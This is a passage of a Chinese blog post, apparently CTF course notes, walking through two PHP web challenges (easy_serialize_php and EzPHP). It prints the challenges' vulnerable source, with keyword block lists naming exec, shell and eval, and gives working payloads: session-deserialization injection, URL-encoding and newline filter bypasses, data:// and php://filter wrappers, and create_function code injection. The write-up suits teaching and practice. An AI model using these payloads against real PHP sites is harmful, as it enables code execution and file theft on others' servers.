<p>四、文件路径信息<br>根据题目中给出的网站源码<br><a href="https://github.com/D0g3-Lab/i-SOON_CTF_2019/tree/master/Web/easy_serialize_php" target="_blank" rel="noopener">https://github.com/D0g3-Lab/i-SOON_CTF_2019/tree/master/Web/easy_serialize_php</a><br>有几个文件比较特别，先转换成base64备用<br>d0g3_f1ag.php:ZDBnM19mMWFnLnBocA==</p>
<p>四、尝试解题<br>我将源码下载下来在本地测试</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">$_SESSION[<span class="string">"user"</span>] = <span class="string">'guest'</span>;</span><br><span class="line">$_SESSION[<span class="string">'function'</span>] = $function;</span><br><span class="line"></span><br><span class="line">extract($_POST);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">'img_path'</span>]))&#123;</span><br><span class="line">    $_SESSION[<span class="string">'img'</span>] = base64_encode(<span class="string">'guest_img.png'</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    $_SESSION[<span class="string">'img'</span>] = sha1(base64_encode($_GET[<span class="string">'img_path'</span>]));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$serialize_info = filter(serialize($_SESSION));</span><br><span class="line"><span class="comment">//输出序列化的结果</span></span><br><span class="line"><span class="keyword">echo</span> $serialize_info;</span><br></pre></td></tr></table></figure>
<p>根据网上查到的信息，我现在要做的就是闭合掉这个序列化的值。<br>这个序列化只会识别第一对{}中间的内容，后面的会抛弃，<br>而且属性值识别为开始:”,结尾为”;中间的内容。<br>现在开始改造我能提交的数据</p>
<p>这时候filter的好处就来了,如果提交的数据中包含<br>‘php’,’flag’,’php5’,’php4’,’fl1g’都会被替换为””<br>构造提交</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_SESSION[fuck_flag_php_php]&#x3D;he&quot;;s:1:&quot;a&quot;;s:3:&quot;img&quot;;s:20:&quot;ZDBnM19mMWFnLnBocA&#x3D;&#x3D;&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="easy_serialize_phppng.png" alt="提交"><br>提交后得到了这个么一东西</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a:2:&#123;s:17:&quot;fuck___&quot;;s:51:&quot;he&quot;;s:1:&quot;a&quot;;s:3:&quot;img&quot;;s:20:&quot;ZDBnM19mMWFnLnBocA&#x3D;&#x3D;&quot;;&#125;&quot;;s:3:&quot;img&quot;;s:20:&quot;Z3Vlc3RfaW1nLnBuZw&#x3D;&#x3D;&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>完美闭合s:17:”fuck___”;s:51:”he”;<br>正式提交得到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$flag &#x3D; &#39;flag in &#x2F;d0g3_fllllllag&#39;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>将//d0g3_fllllllag转BASE64：L2QwZzNfZmxsbGxsbGFn<br>再提交</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_SESSION[fuck_flag_php_php]&#x3D;he&quot;;s:1:&quot;a&quot;;s:3:&quot;img&quot;;s:20:&quot;L2QwZzNfZmxsbGxsbGFn&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>得到flag{2c95fea4-1864-4a87-b05d-ae3bb3c85624} </p>
<h2 id="EzPHP"><a href="#EzPHP" class="headerlink" title="EzPHP"></a>EzPHP</h2><p>根据题目提示上<br><a href="https://github.com/BjdsecCA/BJDCTF2020_January/blob/master/Web/bjdctf2020_web_ezphp/html/" target="_blank" rel="noopener">https://github.com/BjdsecCA/BJDCTF2020_January/blob/master/Web/bjdctf2020_web_ezphp/html/</a><br>找到关键代码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>); </span><br><span class="line"></span><br><span class="line">$file = <span class="string">"1nD3x.php"</span>;</span><br><span class="line">$shana = $_GET[<span class="string">'shana'</span>];</span><br><span class="line">$passwd = $_GET[<span class="string">'passwd'</span>];</span><br><span class="line">$arg = <span class="string">''</span>;</span><br><span class="line">$code = <span class="string">''</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;br /&gt;&lt;font color=red&gt;&lt;B&gt;This is a very simple challenge and if you solve it I will give you a flag. Good Luck!&lt;/B&gt;&lt;br&gt;&lt;/font&gt;"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($_SERVER) &#123; </span><br><span class="line">    <span class="keyword">if</span> (</span><br><span class="line">        preg_match(<span class="string">'/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i'</span>, $_SERVER[<span class="string">'QUERY_STRING'</span>])</span><br><span class="line">        )  </span><br><span class="line">        <span class="keyword">die</span>(<span class="string">'You seem to want to do something bad?'</span>); </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!preg_match(<span class="string">'/http|https/i'</span>, $_GET[<span class="string">'file'</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span> (preg_match(<span class="string">'/^aqua_is_cute$/'</span>, $_GET[<span class="string">'debu'</span>]) &amp;&amp; $_GET[<span class="string">'debu'</span>] !== <span class="string">'aqua_is_cute'</span>) &#123; </span><br><span class="line">        $file = $_GET[<span class="string">"file"</span>]; </span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"Neeeeee! Good Job!&lt;br&gt;"</span>;</span><br><span class="line">    &#125; </span><br><span class="line">&#125; <span class="keyword">else</span> <span class="keyword">die</span>(<span class="string">'fxck you! What do you want to do ?!'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($_REQUEST) &#123; </span><br><span class="line">    <span class="keyword">foreach</span>($_REQUEST <span class="keyword">as</span> $value) &#123; </span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">'/[a-zA-Z]/i'</span>, $value))  </span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'fxck you! I hate English!'</span>); </span><br><span class="line">    &#125; </span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (file_get_contents($file) !== <span class="string">'debu_debu_aqua'</span>)</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">"Aqua is the cutest five-year-old child in the world! Isn't it ?&lt;br&gt;"</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ( sha1($shana) === sha1($passwd) &amp;&amp; $shana != $passwd )&#123;</span><br><span class="line">    extract($_GET[<span class="string">"flag"</span>]);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"Very good! you know my password. But what is flag?&lt;br&gt;"</span>;</span><br><span class="line">&#125; <span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">"fxck you! you don't know my password! And you don't know sha1! why you come here!"</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">'/^[a-z0-9]*$/isD'</span>, $code) || </span><br><span class="line">preg_match(<span class="string">'/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\&#123;|\%|x|\&amp;|\$|\*|\||\&lt;|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i'</span>, $arg) ) &#123; </span><br><span class="line">    <span class="keyword">die</span>(<span class="string">"&lt;br /&gt;Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="</span>); </span><br><span class="line">&#125; <span class="keyword">else</span> &#123; </span><br><span class="line">    <span class="keyword">include</span> <span class="string">"flag.php"</span>;</span><br><span class="line">    $code(<span class="string">''</span>, $arg); </span><br><span class="line">&#125; <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>一堆需要绕过的东西一步一步来吧。</p>
<h3 id="SERVER-‘QUERY-STRING’-绕过"><a href="#SERVER-‘QUERY-STRING’-绕过" class="headerlink" title="$_SERVER[‘QUERY_STRING’]绕过"></a>$_SERVER[‘QUERY_STRING’]绕过</h3><p>PHP中$_SERVER[‘QUERY_STRING’]接收到的数据是不会通过URLDecode转码的，而$_GET[]、$_POST[]会，所以只要进行url编码即可绕过。</p>
<h3 id="preg-match绕过"><a href="#preg-match绕过" class="headerlink" title="preg_match绕过"></a>preg_match绕过</h3><p>第一段要绕过的是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">preg_match(&#39;&#x2F;http|https&#x2F;i&#39;, $\_GET\[&#39;file&#39;\])</span><br></pre></td></tr></table></figure>
<p>不让file传入http和https;</p>
<p>第二段要绕过的是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">preg_match(&#39;&#x2F;^aqua_is_cute$&#x2F;&#39;, $_GET[&#39;debu&#39;]) &amp;&amp; $_GET[&#39;debu&#39;] !&#x3D;&#x3D; &#39;aqua_is_cute&#39;</span><br></pre></td></tr></table></figure>
<p>preg_match只匹配第一行，在句尾加上%0a(换行符)即可绕过。</p>
<p>构造一个playload测试一下前面几步的分析。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?%64%65%62%75&#x3D;%61%71%75%61%5f%69%73%5f%63%75%74%65%0A</span><br></pre></td></tr></table></figure>
<p>返回如下结果</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</span><br><span class="line">Neeeeee! Good Job!</span><br><span class="line">fxck you! I hate English!</span><br></pre></td></tr></table></figure>
<p>看来是可行的。</p>
<h3 id="REQUEST绕过"><a href="#REQUEST绕过" class="headerlink" title="$_REQUEST绕过"></a>$_REQUEST绕过</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>($_REQUEST) &#123; </span><br><span class="line">    <span class="keyword">foreach</span>($_REQUEST <span class="keyword">as</span> $value) &#123; </span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">'/[a-zA-Z]/i'</span>, $value))  </span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'fxck you! I hate English!'</span>); </span><br><span class="line">    &#125; </span><br><span class="line">&#125;  </span><br></pre></td></tr></table></figure>
<p>$_REQUEST是同时接受GET和POST的数据。而且POST的优先级更高。所以如果POST和GET的参数名一样时，会先使用POST传过来的值。<br>这里的正则是只如果包含字母，就退出。POST数字即可。<br><img src="EzPHP_1.png" alt=""></p>
<h3 id="文件内容绕过"><a href="#文件内容绕过" class="headerlink" title="文件内容绕过"></a>文件内容绕过</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file_get_contents($file) !&#x3D;&#x3D; &#39;debu_debu_aqua&#39;</span><br></pre></td></tr></table></figure>
<p>这里是读取一个文件的内容然后跟debu_debu_aqua比较。由于不能使用http和https协议通过网络获取文件。只能考虑用别的方式。（FTP也许行，可惜没有外网服务器）这里考虑使用PHP伪协议。网上说php://input或data://这两个比较靠谱。<br>php://input是将post过来的数据全部当做文件内容<br> data://有以下几种用法<br>  data://text/plain,<?php phpinfo()?><br>  data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=<br>那么我自己构造一个data://来测试一下吧。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file&#x3D;data:&#x2F;&#x2F;text&#x2F;plain;base64,ZGVidV9kZWJ1X2FxdWE&#x3D;</span><br></pre></td></tr></table></figure>
<p>然后转urlencode一下得到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%66%69%6c%65&#x3D;%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%3b%62%61%73%65%36%34%2c%5a%47%56%69%64%56%39%6b%5a%57%4a%31%58%32%46%78%64%57%45%3d</span><br></pre></td></tr></table></figure>
<h3 id="sha1绕过"><a href="#sha1绕过" class="headerlink" title="sha1绕过"></a>sha1绕过</h3><p>与MD5绕过一样，PHP中sha1函数不会解析数组。可以直接使用数组绕过。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shana[]&#x3D;1&amp;passwd[]&#x3D;2;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%73%68%61%6e%61[]&#x3D;1&amp;%70%61%73%73%77%64[]&#x3D;2</span><br></pre></td></tr></table></figure>
<h3 id="最终关卡"><a href="#最终关卡" class="headerlink" title="最终关卡"></a>最终关卡</h3><p>关键点一</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">extract($_GET[&quot;flag&quot;]);</span><br></pre></td></tr></table></figure>
<p>通过这个用户提交的flag向$code和$arg传递最终的破解内容。<br>关键点二</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">preg_match(&#39;&#x2F;fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\&#96;|\&#123;|\%|x|\&amp;|\$|\*|\||\&lt;|\&quot;|\&#39;|\&#x3D;|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^&#x2F;i&#39;, $arg) )</span><br></pre></td></tr></table></figure>
<p>过滤掉了很多东西，需要绕过。<br>已知的办法有<br>1、get_defined_vars()绕过。<br>2、define 定义变量， fopen fgets获取文件内容。<br>3、取反绕过+伪协议读源码<br>4、但是可以^异或和~按位取反绕过。<br>关键点三</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$code(&#39;&#39;, $arg);</span><br></pre></td></tr></table></figure>
<p>这里的考点就是create_function函数。<br>这个东西真有点不好理解,上代码帮助自己理解。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//建立函数的骚操作</span></span><br><span class="line">$myFunc = create_function(<span class="string">'$fuck'</span>, <span class="string">'return $fuck;&#125;echo "ffuck";//'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">//实际被执行的代码，太TM骚了。</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">myFunc</span><span class="params">($fuck)</span></span></span><br><span class="line"><span class="function"></span>&#123; <span class="keyword">return</span> $fuck; &#125; </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"ffuck"</span>;<span class="comment">//&#125;</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>测试代码一：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">flag[code]&#x3D;create_function;</span><br><span class="line">flag[arg]&#x3D;;&#125;require(base64_decode(cmVhMWZsNGcucGhw));var_dump(get_defined_vars());&#x2F;&#x2F;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">%66%6c%61%67[%63%6f%64%65]&#x3D;%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e&amp;</span><br><span class="line">%66%6c%61%67[%61%72%67]&#x3D;%3b%7d%72%65%71%75%69%72%65%28%62%61%73%65%36%34%5f%64%65%63%6f%64%65%28%4d%57%5a%73%59%57%63%75%63%47%68%77%29%29%3b%76%61%72%5f%64%75%6d%70%28%67%65%74%5f%64%65%66%69%6e%65%64%5f%76%61%72%73%28%29%29%3b%2f%2f</span><br></pre></td></tr></table></figure>
<p>结果不对。得想另一种办法了。使用PHP伪协议试试。<br>写一个取反的代码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">echo</span> rawurlencode(<span class="string">";&#125;require(~("</span>.~<span class="string">"php://filter/read=convert.base64-encode/resource=rea1fl4g.php"</span>.<span class="string">"));//"</span>);</span><br></pre></td></tr></table></figure>
<p>合并构造一下。<br><img src="EzPHP_2.png" alt=""><br>终于拿到了flag。</p>

    </div>

    
    
    
        <div class="reward-container">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/file/weixin.png" alt="粗制乱造 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/file/zfb.png" alt="粗制乱造 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/%E7%BB%83%E4%B9%A0%E9%A2%98/" rel="tag"># 练习题</a>
              <a href="/tags/CTF%E8%AF%BE/" rel="tag"># CTF课</a>
              <a href="/tags/WEB/" rel="tag"># WEB</a>
              <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" rel="tag"># 文件上传</a>
              <a href="/tags/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag"># PHP反序列化</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/jxsw_dbw_misc_1/" rel="prev" title="杂项一（大比武_CTF课_第十天）">
      <i class="fa fa-chevron-left"></i> 杂项一（大比武_CTF课_第十天）
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/Python-python3-one/" rel="next" title="Python入门指南(学习笔记一)">
      Python入门指南(学习笔记一) <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#笔记"><span class="nav-number">2.</span> <span class="nav-text">笔记</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#PHP的序列化与反序列化"><span class="nav-number">2.1.</span> <span class="nav-text">PHP的序列化与反序列化</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PHP中的魔术方法"><span class="nav-number">2.2.</span> <span class="nav-text">PHP中的魔术方法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PHP反序列化漏洞原理"><span class="nav-number">2.3.</span> <span class="nav-text">PHP反序列化漏洞原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#序列化测试"><span class="nav-number">2.4.</span> <span class="nav-text">序列化测试</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#做题"><span class="nav-number">3.</span> <span class="nav-text">做题</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#网鼎杯2020青龙组-AreUSerialz"><span class="nav-number">3.1.</span> <span class="nav-text">[网鼎杯2020青龙组]AreUSerialz</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#安洵杯2019-easy-serialize-php"><span class="nav-number">3.2.</span> <span class="nav-text">[安洵杯2019]easy_serialize_php</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#EzPHP"><span class="nav-number">3.3.</span> <span class="nav-text">EzPHP</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SERVER-‘QUERY-STRING’-绕过"><span class="nav-number">3.3.1.</span> <span class="nav-text">$_SERVER[‘QUERY_STRING’]绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#preg-match绕过"><span class="nav-number">3.3.2.</span> <span class="nav-text">preg_match绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#REQUEST绕过"><span class="nav-number">3.3.3.</span> <span class="nav-text">$_REQUEST绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#文件内容绕过"><span class="nav-number">3.3.4.</span> <span class="nav-text">文件内容绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sha1绕过"><span class="nav-number">3.3.5.</span> <span class="nav-text">sha1绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#最终关卡"><span class="nav-number">3.3.6.</span> <span class="nav-text">最终关卡</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="粗制乱造"
      src="/file/avatar.png">
  <p class="site-author-name" itemprop="name">粗制乱造</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">43</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">37</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">59</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">粗制乱造</span>
</div>
  <div class="powered-by">由 <a href="https://czlz.net/" class="theme-link">czlz.net</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
